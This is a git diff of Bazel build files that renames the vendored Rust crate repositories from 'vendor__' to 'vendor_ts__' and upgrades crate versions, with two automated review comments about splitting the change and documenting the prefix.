misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_stdx-0.0.258.bazel => BUILD.ra_ap_stdx-0.0.266.bazel} (84%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_syntax-0.0.258.bazel => BUILD.ra_ap_syntax-0.0.266.bazel} (82%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_syntax-bridge-0.0.258.bazel => BUILD.ra_ap_syntax-bridge-0.0.266.bazel} (80%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_toolchain-0.0.258.bazel => BUILD.ra_ap_toolchain-0.0.266.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_tt-0.0.258.bazel => 
BUILD.ra_ap_tt-0.0.266.bazel} (89%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_vfs-0.0.258.bazel => BUILD.ra_ap_vfs-0.0.266.bazel} (86%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ra_ap_vfs-notify-0.0.258.bazel => BUILD.ra_ap_vfs-notify-0.0.266.bazel} (84%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.8.5.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rand-0.9.0.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.rand_chacha-0.3.1.bazel => BUILD.rand_chacha-0.9.0.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.rand_core-0.6.4.bazel => BUILD.rand_core-0.9.2.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.rustc-hash-2.1.0.bazel => BUILD.rustc-hash-2.1.1.bazel} (99%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.rustc-stable-hash-0.1.1.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.ryu-1.0.18.bazel => BUILD.ryu-1.0.19.bazel} (99%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.serde-1.0.217.bazel => BUILD.serde-1.0.218.bazel} (96%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.serde_derive-1.0.217.bazel => BUILD.serde_derive-1.0.218.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.serde_json-1.0.135.bazel => BUILD.serde_json-1.0.139.bazel} (94%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.smallvec-1.13.2.bazel => BUILD.smallvec-1.14.0.bazel} (99%) delete mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.sptr-0.3.2.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.syn-2.0.96.bazel => BUILD.syn-2.0.98.bazel} (95%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.toml-0.8.19.bazel => BUILD.toml-0.8.20.bazel} (93%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.toml_edit-0.22.22.bazel => 
BUILD.toml_edit-0.22.24.bazel} (92%) rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.unicode-ident-1.0.14.bazel => BUILD.unicode-ident-1.0.16.bazel} (99%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wasi-0.13.3+wasi-0.2.2.bazel rename misc/bazel/3rdparty/tree_sitter_extractors_deps/{BUILD.winnow-0.6.24.bazel => BUILD.winnow-0.7.3.bazel} (99%) create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.wit-bindgen-rt-0.33.0.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-0.8.20.bazel create mode 100644 misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.zerocopy-derive-0.8.20.bazel diff --git a/MODULE.bazel b/MODULE.bazel index c4a2526479a5..8fecb2770b90 100644 --- a/MODULE.bazel +++ b/MODULE.bazel 
@@ -71,57 +71,57 @@ use_repo(
 tree_sitter_extractors_deps = use_extension("//misc/bazel/3rdparty:tree_sitter_extractors_extension.bzl", "r")
 use_repo(
 tree_sitter_extractors_deps,
- "vendor__anyhow-1.0.95",
- "vendor__argfile-0.2.1",
- "vendor__chrono-0.4.39",
- "vendor__clap-4.5.26",
- "vendor__dunce-1.0.5",
- "vendor__either-1.13.0",
- "vendor__encoding-0.2.33",
- "vendor__figment-0.10.19",
- "vendor__flate2-1.0.35",
- "vendor__glob-0.3.2",
- "vendor__globset-0.4.15",
- "vendor__itertools-0.14.0",
- "vendor__lazy_static-1.5.0",
- "vendor__mustache-0.9.0",
- "vendor__num-traits-0.2.19",
- "vendor__num_cpus-1.16.0",
- "vendor__proc-macro2-1.0.93",
- "vendor__quote-1.0.38",
- "vendor__ra_ap_base_db-0.0.258",
- "vendor__ra_ap_cfg-0.0.258",
- "vendor__ra_ap_hir-0.0.258",
- "vendor__ra_ap_hir_def-0.0.258",
- "vendor__ra_ap_hir_expand-0.0.258",
- "vendor__ra_ap_ide_db-0.0.258",
- "vendor__ra_ap_intern-0.0.258",
- "vendor__ra_ap_load-cargo-0.0.258",
- "vendor__ra_ap_parser-0.0.258",
- "vendor__ra_ap_paths-0.0.258",
- "vendor__ra_ap_project_model-0.0.258",
- "vendor__ra_ap_span-0.0.258",
- "vendor__ra_ap_stdx-0.0.258",
- "vendor__ra_ap_syntax-0.0.258",
- "vendor__ra_ap_vfs-0.0.258",
- "vendor__rand-0.8.5",
- "vendor__rayon-1.10.0",
- "vendor__regex-1.11.1",
- "vendor__serde-1.0.217",
- "vendor__serde_json-1.0.135",
- "vendor__serde_with-3.12.0",
- "vendor__syn-2.0.96",
- "vendor__toml-0.8.19",
- "vendor__tracing-0.1.41",
- "vendor__tracing-flame-0.2.0",
- "vendor__tracing-subscriber-0.3.19",
- "vendor__tree-sitter-0.24.6",
- "vendor__tree-sitter-embedded-template-0.23.2",
- "vendor__tree-sitter-json-0.24.8",
- "vendor__tree-sitter-ql-0.23.1",
- "vendor__tree-sitter-ruby-0.23.1",
- "vendor__triomphe-0.1.14",
- "vendor__ungrammar-1.16.1",
+ "vendor_ts__anyhow-1.0.96",
+ "vendor_ts__argfile-0.2.1",
+ "vendor_ts__chrono-0.4.39",
+ "vendor_ts__clap-4.5.31",
+ "vendor_ts__dunce-1.0.5",
+ "vendor_ts__either-1.14.0",
+ "vendor_ts__encoding-0.2.33",
+ "vendor_ts__figment-0.10.19",
+ "vendor_ts__flate2-1.1.0",
+ "vendor_ts__glob-0.3.2",
+ "vendor_ts__globset-0.4.15",
+ "vendor_ts__itertools-0.14.0",
+ "vendor_ts__lazy_static-1.5.0",
+ "vendor_ts__mustache-0.9.0",
+ "vendor_ts__num-traits-0.2.19",
+ "vendor_ts__num_cpus-1.16.0",
+ "vendor_ts__proc-macro2-1.0.93",
+ "vendor_ts__quote-1.0.38",
+ "vendor_ts__ra_ap_base_db-0.0.266",
+ "vendor_ts__ra_ap_cfg-0.0.266",
+ "vendor_ts__ra_ap_hir-0.0.266",
+ "vendor_ts__ra_ap_hir_def-0.0.266",
+ "vendor_ts__ra_ap_hir_expand-0.0.266",
+ "vendor_ts__ra_ap_ide_db-0.0.266",
+ "vendor_ts__ra_ap_intern-0.0.266",
+ "vendor_ts__ra_ap_load-cargo-0.0.266",
+ "vendor_ts__ra_ap_parser-0.0.266",
+ "vendor_ts__ra_ap_paths-0.0.266",
+ "vendor_ts__ra_ap_project_model-0.0.266",
+ "vendor_ts__ra_ap_span-0.0.266",
+ "vendor_ts__ra_ap_stdx-0.0.266",
+ "vendor_ts__ra_ap_syntax-0.0.266",
+ "vendor_ts__ra_ap_vfs-0.0.266",
+ "vendor_ts__rand-0.9.0",
+ "vendor_ts__rayon-1.10.0",
+ "vendor_ts__regex-1.11.1",
+ "vendor_ts__serde-1.0.218",
+ "vendor_ts__serde_json-1.0.139",
+ "vendor_ts__serde_with-3.12.0",
+ "vendor_ts__syn-2.0.98",
+ "vendor_ts__toml-0.8.20",
+ "vendor_ts__tracing-0.1.41",
+ "vendor_ts__tracing-flame-0.2.0",
+ "vendor_ts__tracing-subscriber-0.3.19",
+ "vendor_ts__tree-sitter-0.24.6",
+ "vendor_ts__tree-sitter-embedded-template-0.23.2",
+ "vendor_ts__tree-sitter-json-0.24.8",
+ "vendor_ts__tree-sitter-ql-0.23.1",
+ "vendor_ts__tree-sitter-ruby-0.23.1",
+ "vendor_ts__triomphe-0.1.14",
+ "vendor_ts__ungrammar-1.16.1",
 )
 http_archive = use_repo_rule("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
diff --git a/misc/bazel/3rdparty/BUILD.bazel b/misc/bazel/3rdparty/BUILD.bazel
index 9855fdb1164f..4e12f92edee7 100644
--- a/misc/bazel/3rdparty/BUILD.bazel
+++ b/misc/bazel/3rdparty/BUILD.bazel
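Review bot: The `vendor__` → `vendor_ts__` repository rename and the crate upgrades change the same lines of the `use_repo` list in MODULE.bazel, so the mechanical rename cannot be checked independently of the dependency changes. Within this one hunk `rand` moves from 0.8.5 to 0.9.0, a semver-incompatible step for a 0.x crate, and the diffstat shows crate repositories being created that did not exist before (`wasi-0.13.3+wasi-0.2.2`, `wit-bindgen-rt-0.33.0`, `zerocopy-0.8.20`). Splitting this into a rename-only commit followed by the upgrade would leave a second diff that shows exactly which third-party versions enter the build. Failing that, the description should list the incompatible bumps and the newly added crates, if it does not already.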
@@ -15,7 +15,7 @@ crates_vendor( "//shared/tree-sitter-extractor:Cargo.toml", ], mode = "remote", - repository_name = "vendor", + repository_name = "vendor_ts", tags = ["manual"], vendor_path = "tree_sitter_extractors_deps", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel index 37d0f615d9ff..cade1a4cb938 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.aho-corasick-1.1.3.bazel @@ -86,6 +86,6 @@ rust_library( }), version = "1.1.3", deps = [ - "@vendor__memchr-2.7.4//:memchr", + "@vendor_ts__memchr-2.7.4//:memchr", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel index d95cf3dfd87a..bb05dcce52e4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.always-assert-0.2.0.bazel @@ -84,6 +84,6 @@ rust_library( }), version = "0.2.0", deps = [ - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel index 700ea1d12517..a6d0823636ee 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.android_system_properties-0.1.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.1.5", deps = [ - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__libc-0.2.169//:libc", ], ) 
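Review bot: The new `repository_name = "vendor_ts"` in `misc/bazel/3rdparty/BUILD.bazel` carries no comment saying that this string is the prefix of every `vendor_ts__<crate>-<version>` repository named in MODULE.bazel's `use_repo` list and in the generated BUILD files under `tree_sitter_extractors_deps`. Editing it without regenerating those files would leave their labels pointing at repositories that are no longer defined, which is presumably why this commit touches 222 files. I would add `# Prefix of the vendor_ts__* repos in MODULE.bazel; re-vendor after changing it.` above the attribute. The `crates_vendor(` call starts outside the hunk.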
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel index d317a8b4049c..3221dab6e8ba 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstream-0.6.18.bazel @@ -86,21 +86,21 @@ rust_library( }), version = "0.6.18", deps = [ - "@vendor__anstyle-1.0.10//:anstyle", - "@vendor__anstyle-parse-0.2.6//:anstyle_parse", - "@vendor__anstyle-query-1.1.2//:anstyle_query", - "@vendor__colorchoice-1.0.3//:colorchoice", - "@vendor__is_terminal_polyfill-1.70.1//:is_terminal_polyfill", - "@vendor__utf8parse-0.2.2//:utf8parse", + "@vendor_ts__anstyle-1.0.10//:anstyle", + "@vendor_ts__anstyle-parse-0.2.6//:anstyle_parse", + "@vendor_ts__anstyle-query-1.1.2//:anstyle_query", + "@vendor_ts__colorchoice-1.0.3//:colorchoice", + "@vendor_ts__is_terminal_polyfill-1.70.1//:is_terminal_polyfill", + "@vendor_ts__utf8parse-0.2.2//:utf8parse", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__anstyle-wincon-3.0.6//:anstyle_wincon", # aarch64-pc-windows-msvc + "@vendor_ts__anstyle-wincon-3.0.7//:anstyle_wincon", # aarch64-pc-windows-msvc ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__anstyle-wincon-3.0.6//:anstyle_wincon", # i686-pc-windows-msvc + "@vendor_ts__anstyle-wincon-3.0.7//:anstyle_wincon", # i686-pc-windows-msvc ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__anstyle-wincon-3.0.6//:anstyle_wincon", # x86_64-pc-windows-msvc + "@vendor_ts__anstyle-wincon-3.0.7//:anstyle_wincon", # x86_64-pc-windows-msvc ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel index 5f1a8e7b478c..afc929f16948 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-parse-0.2.6.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.2.6", deps = [ - "@vendor__utf8parse-0.2.2//:utf8parse", + "@vendor_ts__utf8parse-0.2.2//:utf8parse", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel index 1256ede91579..2c8e86e0445e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-query-1.1.2.bazel @@ -82,13 +82,13 @@ rust_library( version = "1.1.2", deps = select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.7.bazel similarity index 88% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.6.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.7.bazel index 6490cd9011e8..b3491e3a0594 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anstyle-wincon-3.0.7.bazel 
@@ -79,18 +79,21 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "3.0.6", + version = "3.0.7", deps = [ - "@vendor__anstyle-1.0.10//:anstyle", + "@vendor_ts__anstyle-1.0.10//:anstyle", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__once_cell-1.20.3//:once_cell", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__once_cell-1.20.3//:once_cell", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.59.0//:windows_sys", # cfg(windows) + "@vendor_ts__once_cell-1.20.3//:once_cell", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.95.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.96.bazel similarity index 97% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.95.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.96.bazel index 30ee807dacf3..25be98a2a2aa 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.95.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.anyhow-1.0.96.bazel @@ -84,9 +84,9 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.0.95", + version = "1.0.96", deps = [ - "@vendor__anyhow-1.0.95//:build_script_build", + "@vendor_ts__anyhow-1.0.96//:build_script_build", ], ) 
@@ -139,7 +139,7 @@ cargo_build_script( "noclippy", "norustfmt", ], - version = "1.0.95", + version = "1.0.96", visibility = ["//visibility:private"], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel index a7f09f81f519..b2fff86bc5d9 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.argfile-0.2.1.bazel @@ -84,7 +84,7 @@ rust_library( }), version = "0.2.1", deps = [ - "@vendor__fs-err-2.11.0//:fs_err", - "@vendor__os_str_bytes-7.0.0//:os_str_bytes", + "@vendor_ts__fs-err-2.11.0//:fs_err", + "@vendor_ts__os_str_bytes-7.0.0//:os_str_bytes", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel index ccbde7b37ad2..fb24bd230eef 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.atomic-0.6.0.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.6.0", deps = [ - "@vendor__bytemuck-1.21.0//:bytemuck", + "@vendor_ts__bytemuck-1.21.0//:bytemuck", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel index 952ad2432905..3632f78bd5f4 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.bazel 
@@ -32,619 +32,619 @@ filegroup( # Workspace Member Dependencies alias( - name = "anyhow-1.0.95", - actual = "@vendor__anyhow-1.0.95//:anyhow", + name = "anyhow-1.0.96", + actual = "@vendor_ts__anyhow-1.0.96//:anyhow", tags = ["manual"], ) alias( name = "anyhow", - actual = "@vendor__anyhow-1.0.95//:anyhow", + actual = "@vendor_ts__anyhow-1.0.96//:anyhow", tags = ["manual"], ) alias( name = "argfile-0.2.1", - actual = "@vendor__argfile-0.2.1//:argfile", + actual = "@vendor_ts__argfile-0.2.1//:argfile", tags = ["manual"], ) alias( name = "argfile", - actual = "@vendor__argfile-0.2.1//:argfile", + actual = "@vendor_ts__argfile-0.2.1//:argfile", tags = ["manual"], ) alias( name = "chrono-0.4.39", - actual = "@vendor__chrono-0.4.39//:chrono", + actual = "@vendor_ts__chrono-0.4.39//:chrono", tags = ["manual"], ) alias( name = "chrono", - actual = "@vendor__chrono-0.4.39//:chrono", + actual = "@vendor_ts__chrono-0.4.39//:chrono", tags = ["manual"], ) alias( - name = "clap-4.5.26", - actual = "@vendor__clap-4.5.26//:clap", + name = "clap-4.5.31", + actual = "@vendor_ts__clap-4.5.31//:clap", tags = ["manual"], ) alias( name = "clap", - actual = "@vendor__clap-4.5.26//:clap", + actual = "@vendor_ts__clap-4.5.31//:clap", tags = ["manual"], ) alias( name = "dunce-1.0.5", - actual = "@vendor__dunce-1.0.5//:dunce", + actual = "@vendor_ts__dunce-1.0.5//:dunce", tags = ["manual"], ) alias( name = "dunce", - actual = "@vendor__dunce-1.0.5//:dunce", + actual = "@vendor_ts__dunce-1.0.5//:dunce", tags = ["manual"], ) alias( - name = "either-1.13.0", - actual = "@vendor__either-1.13.0//:either", + name = "either-1.14.0", + actual = "@vendor_ts__either-1.14.0//:either", tags = ["manual"], ) alias( name = "either", - actual = "@vendor__either-1.13.0//:either", + actual = "@vendor_ts__either-1.14.0//:either", tags = ["manual"], ) alias( name = "encoding-0.2.33", - actual = "@vendor__encoding-0.2.33//:encoding", + actual = "@vendor_ts__encoding-0.2.33//:encoding", tags = ["manual"], ) 
alias( name = "encoding", - actual = "@vendor__encoding-0.2.33//:encoding", + actual = "@vendor_ts__encoding-0.2.33//:encoding", tags = ["manual"], ) alias( name = "figment-0.10.19", - actual = "@vendor__figment-0.10.19//:figment", + actual = "@vendor_ts__figment-0.10.19//:figment", tags = ["manual"], ) alias( name = "figment", - actual = "@vendor__figment-0.10.19//:figment", + actual = "@vendor_ts__figment-0.10.19//:figment", tags = ["manual"], ) alias( - name = "flate2-1.0.35", - actual = "@vendor__flate2-1.0.35//:flate2", + name = "flate2-1.1.0", + actual = "@vendor_ts__flate2-1.1.0//:flate2", tags = ["manual"], ) alias( name = "flate2", - actual = "@vendor__flate2-1.0.35//:flate2", + actual = "@vendor_ts__flate2-1.1.0//:flate2", tags = ["manual"], ) alias( name = "glob-0.3.2", - actual = "@vendor__glob-0.3.2//:glob", + actual = "@vendor_ts__glob-0.3.2//:glob", tags = ["manual"], ) alias( name = "glob", - actual = "@vendor__glob-0.3.2//:glob", + actual = "@vendor_ts__glob-0.3.2//:glob", tags = ["manual"], ) alias( name = "globset-0.4.15", - actual = "@vendor__globset-0.4.15//:globset", + actual = "@vendor_ts__globset-0.4.15//:globset", tags = ["manual"], ) alias( name = "globset", - actual = "@vendor__globset-0.4.15//:globset", + actual = "@vendor_ts__globset-0.4.15//:globset", tags = ["manual"], ) alias( name = "itertools-0.14.0", - actual = "@vendor__itertools-0.14.0//:itertools", + actual = "@vendor_ts__itertools-0.14.0//:itertools", tags = ["manual"], ) alias( name = "itertools", - actual = "@vendor__itertools-0.14.0//:itertools", + actual = "@vendor_ts__itertools-0.14.0//:itertools", tags = ["manual"], ) alias( name = "lazy_static-1.5.0", - actual = "@vendor__lazy_static-1.5.0//:lazy_static", + actual = "@vendor_ts__lazy_static-1.5.0//:lazy_static", tags = ["manual"], ) alias( name = "lazy_static", - actual = "@vendor__lazy_static-1.5.0//:lazy_static", + actual = "@vendor_ts__lazy_static-1.5.0//:lazy_static", tags = ["manual"], ) alias( name = 
"mustache-0.9.0", - actual = "@vendor__mustache-0.9.0//:mustache", + actual = "@vendor_ts__mustache-0.9.0//:mustache", tags = ["manual"], ) alias( name = "mustache", - actual = "@vendor__mustache-0.9.0//:mustache", + actual = "@vendor_ts__mustache-0.9.0//:mustache", tags = ["manual"], ) alias( name = "num-traits-0.2.19", - actual = "@vendor__num-traits-0.2.19//:num_traits", + actual = "@vendor_ts__num-traits-0.2.19//:num_traits", tags = ["manual"], ) alias( name = "num-traits", - actual = "@vendor__num-traits-0.2.19//:num_traits", + actual = "@vendor_ts__num-traits-0.2.19//:num_traits", tags = ["manual"], ) alias( name = "num_cpus-1.16.0", - actual = "@vendor__num_cpus-1.16.0//:num_cpus", + actual = "@vendor_ts__num_cpus-1.16.0//:num_cpus", tags = ["manual"], ) alias( name = "num_cpus", - actual = "@vendor__num_cpus-1.16.0//:num_cpus", + actual = "@vendor_ts__num_cpus-1.16.0//:num_cpus", tags = ["manual"], ) alias( name = "proc-macro2-1.0.93", - actual = "@vendor__proc-macro2-1.0.93//:proc_macro2", + actual = "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", tags = ["manual"], ) alias( name = "proc-macro2", - actual = "@vendor__proc-macro2-1.0.93//:proc_macro2", + actual = "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", tags = ["manual"], ) alias( name = "quote-1.0.38", - actual = "@vendor__quote-1.0.38//:quote", + actual = "@vendor_ts__quote-1.0.38//:quote", tags = ["manual"], ) alias( name = "quote", - actual = "@vendor__quote-1.0.38//:quote", + actual = "@vendor_ts__quote-1.0.38//:quote", tags = ["manual"], ) alias( - name = "ra_ap_base_db-0.0.258", - actual = "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", + name = "ra_ap_base_db-0.0.266", + actual = "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", tags = ["manual"], ) alias( name = "ra_ap_base_db", - actual = "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", + actual = "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", tags = ["manual"], ) alias( - name = "ra_ap_cfg-0.0.258", - actual = 
"@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", + name = "ra_ap_cfg-0.0.266", + actual = "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", tags = ["manual"], ) alias( name = "ra_ap_cfg", - actual = "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", + actual = "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", tags = ["manual"], ) alias( - name = "ra_ap_hir-0.0.258", - actual = "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir", + name = "ra_ap_hir-0.0.266", + actual = "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir", tags = ["manual"], ) alias( name = "ra_ap_hir", - actual = "@vendor__ra_ap_hir-0.0.258//:ra_ap_hir", + actual = "@vendor_ts__ra_ap_hir-0.0.266//:ra_ap_hir", tags = ["manual"], ) alias( - name = "ra_ap_hir_def-0.0.258", - actual = "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", + name = "ra_ap_hir_def-0.0.266", + actual = "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", tags = ["manual"], ) alias( name = "ra_ap_hir_def", - actual = "@vendor__ra_ap_hir_def-0.0.258//:ra_ap_hir_def", + actual = "@vendor_ts__ra_ap_hir_def-0.0.266//:ra_ap_hir_def", tags = ["manual"], ) alias( - name = "ra_ap_hir_expand-0.0.258", - actual = "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", + name = "ra_ap_hir_expand-0.0.266", + actual = "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", tags = ["manual"], ) alias( name = "ra_ap_hir_expand", - actual = "@vendor__ra_ap_hir_expand-0.0.258//:ra_ap_hir_expand", + actual = "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", tags = ["manual"], ) alias( - name = "ra_ap_ide_db-0.0.258", - actual = "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db", + name = "ra_ap_ide_db-0.0.266", + actual = "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db", tags = ["manual"], ) alias( name = "ra_ap_ide_db", - actual = "@vendor__ra_ap_ide_db-0.0.258//:ra_ap_ide_db", + actual = "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db", tags = ["manual"], ) alias( - name = "ra_ap_intern-0.0.258", - actual = "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", + name = 
